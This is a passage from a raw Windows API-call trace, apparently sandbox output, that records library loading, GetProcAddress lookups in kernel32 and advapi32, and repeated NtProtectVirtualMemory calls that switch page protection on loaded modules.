returned 0xc [0053.786] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0053.786] GetLastError () returned 0x0 [0053.786] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x77711520, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x4, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x20) returned 0x0 [0053.786] GetCurrentProcess () returned 0xffffffff [0053.786] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x77711520, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x20, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x4) returned 0x0 [0053.786] GetCurrentProcess () returned 0xffffffff [0053.786] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x77711540, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x4, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x20) returned 0x0 [0053.787] GetCurrentProcess () returned 0xffffffff [0053.787] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x77711540, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x20, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x4) returned 0x0 [0053.787] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x7771175c, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x4, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x20) returned 0x0 [0053.787] GetCurrentProcess () returned 0xffffffff [0053.787] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x7771175c, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x20, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x4) returned 0x0 [0053.787] GetCurrentProcess () returned 0xffffffff [0053.787] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x77711768, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x4, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x20) returned 0x0 [0053.787] GetCurrentProcess () returned 0xffffffff [0053.787] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x77711768, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x20, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x4) returned 0x0 [0053.788] GetCurrentProcess () returned 0xffffffff [0053.788] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x777117b8, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x4, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x20) returned 0x0 [0053.788] GetCurrentProcess () returned 0xffffffff [0053.788] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x777117b8, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x20, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x4) returned 0x0 [0053.788] GetCurrentProcess () returned 0xffffffff [0053.788] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x777117bc, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x4, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x20) returned 0x0 [0053.788] GetCurrentProcess () returned 0xffffffff [0053.788] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x777117bc, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x20, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x4) returned 0x0 [0053.788] GetCurrentProcess () returned 0xffffffff [0053.788] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x777117c8, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x4, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x20) returned 0x0 [0053.789] GetCurrentProcess () returned 0xffffffff [0053.789] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x777117c8, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x20, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x4) returned 0x0 [0053.789] GetCurrentProcess () returned 0xffffffff [0053.789] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x777117d0, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x4, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x20) returned 0x0 [0053.789] GetCurrentProcess () returned 0xffffffff [0053.789] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x777117d0, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x20, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x4) returned 0x0 [0053.789] GetCurrentProcess () returned 0xffffffff [0053.789] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x7771180c, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x4, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x20) returned 0x0 [0053.789] GetCurrentProcess () returned 0xffffffff [0053.789] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x7771180c, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x20, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x4) returned 0x0 [0053.790] GetCurrentProcess () returned 0xffffffff [0053.790] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x7771182c, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x4, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x20) returned 0x0 [0053.790] GetCurrentProcess () returned 0xffffffff [0053.790] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x7771182c, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x20, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x4) returned 0x0 [0053.790] GetCurrentProcess () returned 0xffffffff [0053.790] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x77711860, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x4, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x20) returned 0x0 [0053.790] GetCurrentProcess () returned 0xffffffff [0053.790] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f490*=0x77711860, NumberOfBytesToProtect=0x41f494, NewAccessProtection=0x20, OldAccessProtection=0x41f4c8 | out: BaseAddress=0x41f490*=0x77711000, NumberOfBytesToProtect=0x41f494, OldAccessProtection=0x41f4c8*=0x4) returned 0x0 [0053.791] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryInfoKeyW") returned 0x777246e7 [0053.791] GetProcAddress (hModule=0x77710000, lpProcName="RegEnumKeyExW") returned 0x777246c8 [0053.792] GetProcAddress (hModule=0x77710000, lpProcName="RegEnumValueW") returned 0x777248cc [0053.792] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0053.793] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0053.793] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0053.799] SysReAllocStringLen (in: pbstr=0x41f374*=0x0, psz="mscoreei.dll", len=0xc | out: pbstr=0x41f374*="mscoreei.dll") returned 1 [0053.799] CharLowerBuffW (in: lpsz="mscoreei.dll", cchLength=0xc | out: lpsz="mscoreei.dll") returned 0xc [0053.799] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", hFile=0x0, dwFlags=0x8) returned 0x754f0000 [0059.429] SysReAllocStringLen (in: pbstr=0x41efac*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41efac*="kernel32.dll") returned 1 [0059.429] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0059.430] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0059.432] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0059.434] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0059.436] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0059.438] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0059.440] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0059.440] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0059.440] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0059.440] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0059.441] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0059.441] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0059.441] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0059.441] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0059.441] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0059.441] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0059.442] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0059.442] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0059.442] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0059.442] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0059.442] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0059.442] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0059.442] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0059.443] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0059.443] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0059.443] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0059.443] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0059.443] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0059.443] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0059.443] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0059.444] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0059.444] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0059.444] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0059.444] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0059.444] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0059.792] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21b68, cbMultiByte=12, lpWideCharStr=0x41defc, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dll?m?A돲矇?m?m") returned 12 [0059.792] SysReAllocStringLen (in: pbstr=0x41ef00*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x41ef00*="ADVAPI32.dll") returned 1 [0059.792] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0059.792] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0059.792] GetLastError () returned 0x0 [0059.793] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x77711520, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x4, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x20) returned 0x0 [0059.794] GetCurrentProcess () returned 0xffffffff [0059.794] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x77711520, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x20, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x4) returned 0x0 [0059.794] GetCurrentProcess () returned 0xffffffff [0059.794] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x77711540, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x4, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x20) returned 0x0 [0059.794] GetCurrentProcess () returned 0xffffffff [0059.794] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x77711540, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x20, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x4) returned 0x0 [0059.794] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x7771175c, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x4, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x20) returned 0x0 [0059.795] GetCurrentProcess () returned 0xffffffff [0059.795] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x7771175c, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x20, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x4) returned 0x0 [0059.795] GetCurrentProcess () returned 0xffffffff [0059.795] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x77711768, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x4, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x20) returned 0x0 [0059.795] GetCurrentProcess () returned 0xffffffff [0059.795] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x77711768, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x20, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x4) returned 0x0 [0059.795] GetCurrentProcess () returned 0xffffffff [0059.795] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x777117b8, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x4, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x20) returned 0x0 [0059.796] GetCurrentProcess () returned 0xffffffff [0059.796] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x777117b8, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x20, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x4) returned 0x0 [0059.796] GetCurrentProcess () returned 0xffffffff [0059.796] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x777117bc, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x4, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x20) returned 0x0 [0059.796] GetCurrentProcess () returned 0xffffffff [0059.796] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x777117bc, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x20, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x4) returned 0x0 [0059.797] GetCurrentProcess () returned 0xffffffff [0059.797] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x777117c8, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x4, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x20) returned 0x0 [0059.797] GetCurrentProcess () returned 0xffffffff [0059.797] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x777117c8, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x20, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x4) returned 0x0 [0059.797] GetCurrentProcess () returned 0xffffffff [0059.797] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x777117d0, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x4, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x20) returned 0x0 [0059.797] GetCurrentProcess () returned 0xffffffff [0059.797] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x777117d0, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x20, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x4) returned 0x0 [0059.798] GetCurrentProcess () returned 0xffffffff [0059.798] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x7771180c, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x4, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x20) returned 0x0 [0059.798] GetCurrentProcess () returned 0xffffffff [0059.798] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x7771180c, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x20, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x4) returned 0x0 [0059.798] GetCurrentProcess () returned 0xffffffff [0059.798] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x7771182c, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x4, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x20) returned 0x0 [0059.798] GetCurrentProcess () returned 0xffffffff [0059.798] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x7771182c, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x20, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x4) returned 0x0 [0059.798] GetCurrentProcess () returned 0xffffffff [0059.798] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x77711860, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x4, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x20) returned 0x0 [0059.799] GetCurrentProcess () returned 0xffffffff [0059.799] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41eeec*=0x77711860, NumberOfBytesToProtect=0x41eef0, NewAccessProtection=0x20, OldAccessProtection=0x41ef24 | out: BaseAddress=0x41eeec*=0x77711000, NumberOfBytesToProtect=0x41eef0, OldAccessProtection=0x41ef24*=0x4) returned 0x0 [0059.801] GetProcAddress (hModule=0x77710000, lpProcName="EventSetInformation") returned 0x0 [0059.801] FreeLibrary (hLibModule=0x77710000) returned 1 [0059.803] SysReAllocStringLen (in: pbstr=0x41efe0*=0x0, psz="mscoree.dll", len=0xb | out: pbstr=0x41efe0*="mscoree.dll") returned 1 [0059.803] CharLowerBuffW (in: lpsz="mscoree.dll", cchLength=0xb | out: lpsz="mscoree.dll") returned 0xb [0059.803] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x75620000 [0059.826] GetProcAddress (hModule=0x75620000, lpProcName=0x8e) returned 0x75634c4d [0059.827] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0059.828] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0059.828] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0059.828] GetLastError () returned 0xcb [0059.829] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x75560010, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x4, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x2) returned 0x0 [0059.829] GetCurrentProcess () returned 0xffffffff [0059.829] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x75560010, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x2, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x4) returned 0x0 [0059.829] GetCurrentProcess () returned 0xffffffff [0059.829] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x75560014, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x4, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x2) returned 0x0 [0059.829] GetCurrentProcess () returned 0xffffffff [0059.829] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x75560014, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x2, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x4) returned 0x0 [0059.829] GetCurrentProcess () returned 0xffffffff [0059.829] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x75560018, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x4, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x2) returned 0x0 [0059.829] GetCurrentProcess () returned 0xffffffff [0059.830] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x75560018, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x2, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x4) returned 0x0 [0059.830] GetCurrentProcess () returned 0xffffffff [0059.830] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x7556002c, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x4, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x2) returned 0x0 [0059.830] GetCurrentProcess () returned 0xffffffff [0059.830] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x7556002c, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x2, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x4) returned 0x0 [0059.830] GetCurrentProcess () returned 0xffffffff [0059.830] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x75560048, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x4, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x2) returned 0x0 [0059.830] GetCurrentProcess () returned 0xffffffff [0059.830] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x75560048, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x2, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x4) returned 0x0 [0059.830] GetCurrentProcess () returned 0xffffffff [0059.831] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x75560050, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x4, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x2) returned 0x0 [0059.831] GetCurrentProcess () returned 0xffffffff [0059.831] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x75560050, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x2, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x4) returned 0x0 [0059.831] GetCurrentProcess () returned 0xffffffff [0059.831] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x75560074, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x4, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x2) returned 0x0 [0059.831] GetCurrentProcess () returned 0xffffffff [0059.831] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x75560074, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x2, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x4) returned 0x0 [0059.831] GetCurrentProcess () returned 0xffffffff [0059.831] NtProtectVirtualMemory (in: 